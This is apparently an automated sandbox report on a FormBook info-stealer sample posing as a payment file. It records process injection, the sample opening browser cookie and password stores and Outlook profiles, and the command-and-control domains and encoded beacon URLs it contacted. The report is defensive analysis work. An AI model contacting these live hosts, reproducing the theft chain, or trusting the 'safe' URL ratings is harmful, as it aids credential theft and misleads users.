                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\bitsadmin.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\bitsadmin.exeThread register set: target process: 6196Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\bitsadmin.exeThread APC queued: target process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2ABB008Jump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002BB106 LogonUserW,0_2_002BB106
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00283D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00283D19
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002C411C SendInput,keybd_event,0_2_002C411C
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002C74BB mouse_event,0_2_002C74BB
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"Jump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002BA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_002BA66C
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002C71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_002C71FA
                Source: QvLFrfAuvuCLc.exe, 00000004.00000002.4596502314.0000000001190000.00000002.00000001.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000000.2303132097.0000000001190000.00000002.00000001.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000002.4596552938.0000000001800000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: OUTSTANDING BALANCE PAYMENT.exe, QvLFrfAuvuCLc.exe, 00000004.00000002.4596502314.0000000001190000.00000002.00000001.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000000.2303132097.0000000001190000.00000002.00000001.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000002.4596552938.0000000001800000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: QvLFrfAuvuCLc.exe, 00000004.00000002.4596502314.0000000001190000.00000002.00000001.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000000.2303132097.0000000001190000.00000002.00000001.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000002.4596552938.0000000001800000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: OUTSTANDING BALANCE PAYMENT.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: QvLFrfAuvuCLc.exe, 00000004.00000002.4596502314.0000000001190000.00000002.00000001.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000000.2303132097.0000000001190000.00000002.00000001.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000002.4596552938.0000000001800000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002A65C4 cpuid 0_2_002A65C4
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002D091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_002D091D
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002FB340 GetUserNameW,0_2_002FB340
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002B1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_002B1E8E
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_0029DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0029DDC0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4596765676.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2392608967.0000000007B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4599520546.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4592072566.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2379572846.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4596524893.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4597050581.0000000002740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2384044672.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: OUTSTANDING BALANCE PAYMENT.exeBinary or memory string: WIN_81
                Source: OUTSTANDING BALANCE PAYMENT.exeBinary or memory string: WIN_XP
                Source: OUTSTANDING BALANCE PAYMENT.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: OUTSTANDING BALANCE PAYMENT.exeBinary or memory string: WIN_XPe
                Source: OUTSTANDING BALANCE PAYMENT.exeBinary or memory string: WIN_VISTA
                Source: OUTSTANDING BALANCE PAYMENT.exeBinary or memory string: WIN_7
                Source: OUTSTANDING BALANCE PAYMENT.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4596765676.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2392608967.0000000007B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4599520546.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4592072566.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2379572846.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4596524893.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4597050581.0000000002740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2384044672.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002D8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_002D8C4F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002D923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_002D923B

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		3
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		2
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1563620 Sample: OUTSTANDING BALANCE PAYMENT.exe Startdate: 27/11/2024 Architecture: WINDOWS Score: 100 28 www.soainsaat.xyz 2->28 30 www.duwixushx.xyz 2->30 32 14 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 6 other signatures 2->50 10 OUTSTANDING BALANCE PAYMENT.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 QvLFrfAuvuCLc.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 bitsadmin.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 QvLFrfAuvuCLc.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.xcvbj.asia 149.88.81.190, 49858, 49865, 49872 SAIC-ASUS United States 22->34 36 www.duwixushx.xyz 156.251.17.224, 50032, 50033, 50034 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 22->36 38 10 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                OUTSTANDING BALANCE PAYMENT.exe39%ReversingLabsWin32.Trojan.AutoitInject
                OUTSTANDING BALANCE PAYMENT.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.duwixushx.xyz/q0vk/0%Avira URL Cloudsafe
                http://www.rafconstrutora.online/1jao/0%Avira URL Cloudsafe
                http://server/get.asp0%Avira URL Cloudsafe
                http://www.rgenerousrs.store/o362/?Kp=6N8LUn6pGPW&6dr=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqA0qO3SSFE3YHITh7+9T1aVwk8yasaXm8yz75cRrj4u8mi8kZiIg=0%Avira URL Cloudsafe
                http://www.vayui.top/vg0z/?6dr=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTFrWSncccbEBJ6T2ZUmHvVL3BVpynffLQ4AgBix/2srBcYLhAIes=&Kp=6N8LUn6pGPW0%Avira URL Cloudsafe
                http://www.duwixushx.xyz/q0vk/?Kp=6N8LUn6pGPW&6dr=TqE1JZ2PW3JWY2ub7wbyGmkAFORXr7+yOAYp2neLNqkwqfDGdEjMQdAOFdDc8sxV6WeqUhb2JmW0DlQMLtnU5QjuOQNkNi2JEE5AET6tFv2ZXVhBmCTejYrGfFb1t6Bzh+26W2w=0%Avira URL Cloudsafe
                http://www.amayavp.xyz/d9ku/?6dr=oAmOaC9rLcmuYnVpEIiUFnJetHEZs20%Avira URL Cloudsafe
                http://www.laohub10.net/sgdd/0%Avira URL Cloudsafe
                http://www.soainsaat.xyz/rum2/0%Avira URL Cloudsafe
                http://www.nb-shenshi.buzz/xxr1/?6dr=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=&Kp=6N8LUn6pGPW0%Avira URL Cloudsafe
                http://www.t91rl7.pro/jhb8/0%Avira URL Cloudsafe
                http://www.vayui.top/vg0z/0%Avira URL Cloudsafe
                https://www.hostgator.com.br0%Avira URL Cloudsafe
                http://www.rgenerousrs.store/o362/0%Avira URL Cloudsafe
                http://www.laohub10.net/sgdd/?6dr=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&Kp=6N8LUn6pGPW0%Avira URL Cloudsafe
                http://www.rafconstrutora.online/1jao/?6dr=wXeCFQWa9OsffQZ2WhWSf1ZyxcnJa4mUhyyCbFo+uZizrpQ17AwBRErPIC2GsWEsFfVeFw/t98C8OszppSdM03IMcNL7coNMrr+HJhleldbbhLhSE02VC7Ooq1hKOjwi60t3Eow=&Kp=6N8LUn6pGPW0%Avira URL Cloudsafe
                http://www.learnwithus.site/alu5/0%Avira URL Cloudsafe
                http://www.amayavp.xyz/d9ku/?6dr=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&Kp=6N8LUn6pGPW0%Avira URL Cloudsafe
                http://www.7vh2wy.top/n7xy/0%Avira URL Cloudsafe
                http://www.xcvbj.asia/rq1s/0%Avira URL Cloudsafe
                http://www.amayavp.xyz/d9ku/0%Avira URL Cloudsafe
                http://www.duwixushx.xyz0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.learnwithus.site
                		209.74.77.107
                		truetrue
                  		unknown
                  www.vayui.top
                  		172.67.145.234
                  		truetrue
                    		unknown
                    www.amayavp.xyz
                    		185.27.134.144
                    		truefalse
                      		high
                      www.7vh2wy.top
                      		20.2.249.7
                      		truetrue
                        		unknown
                        r0lqcud7.nbnnn.xyz
                        		27.124.4.246
                        		truetrue
                          		unknown
                          www.xcvbj.asia
                          		149.88.81.190
                          		truetrue
                            		unknown
                            www.duwixushx.xyz
                            		156.251.17.224
                            		truetrue
                              		unknown
                              www.rafconstrutora.online
                              		104.21.34.103
                              		truetrue
                                		unknown
                                www.rgenerousrs.store
                                		172.67.167.146
                                		truetrue
                                  		unknown
                                  www.nb-shenshi.buzz
                                  		161.97.168.245
                                  		truetrue
                                    		unknown
                                    natroredirect.natrocdn.com
                                    		85.159.66.93
                                    		truefalse
                                      		high
                                      www.t91rl7.pro
                                      		154.88.22.101
                                      		truetrue
                                        		unknown
                                        www.cuthethoi.online
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.soainsaat.xyz
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.laohub10.net
                                            		unknown
                                            		unknownfalse
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.duwixushx.xyz/q0vk/?Kp=6N8LUn6pGPW&6dr=TqE1JZ2PW3JWY2ub7wbyGmkAFORXr7+yOAYp2neLNqkwqfDGdEjMQdAOFdDc8sxV6WeqUhb2JmW0DlQMLtnU5QjuOQNkNi2JEE5AET6tFv2ZXVhBmCTejYrGfFb1t6Bzh+26W2w=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.duwixushx.xyz/q0vk/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.soainsaat.xyz/rum2/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.rgenerousrs.store/o362/?Kp=6N8LUn6pGPW&6dr=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqA0qO3SSFE3YHITh7+9T1aVwk8yasaXm8yz75cRrj4u8mi8kZiIg=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.vayui.top/vg0z/?6dr=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTFrWSncccbEBJ6T2ZUmHvVL3BVpynffLQ4AgBix/2srBcYLhAIes=&Kp=6N8LUn6pGPWtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.rafconstrutora.online/1jao/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.nb-shenshi.buzz/xxr1/?6dr=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=&Kp=6N8LUn6pGPWtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.laohub10.net/sgdd/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.vayui.top/vg0z/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.t91rl7.pro/jhb8/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.rgenerousrs.store/o362/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.learnwithus.site/alu5/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.laohub10.net/sgdd/?6dr=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&Kp=6N8LUn6pGPWtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.rafconstrutora.online/1jao/?6dr=wXeCFQWa9OsffQZ2WhWSf1ZyxcnJa4mUhyyCbFo+uZizrpQ17AwBRErPIC2GsWEsFfVeFw/t98C8OszppSdM03IMcNL7coNMrr+HJhleldbbhLhSE02VC7Ooq1hKOjwi60t3Eow=&Kp=6N8LUn6pGPWtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.7vh2wy.top/n7xy/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.xcvbj.asia/rq1s/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.amayavp.xyz/d9ku/?6dr=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&Kp=6N8LUn6pGPWtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.amayavp.xyz/d9ku/true
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabbitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icobitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://server/get.aspsvchost.exe, 00000002.00000003.2348113087.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347953468.000000000301A000.00000004.00000020.00020000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000002.4595971404.0000000000D08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.ecosia.org/newtab/bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
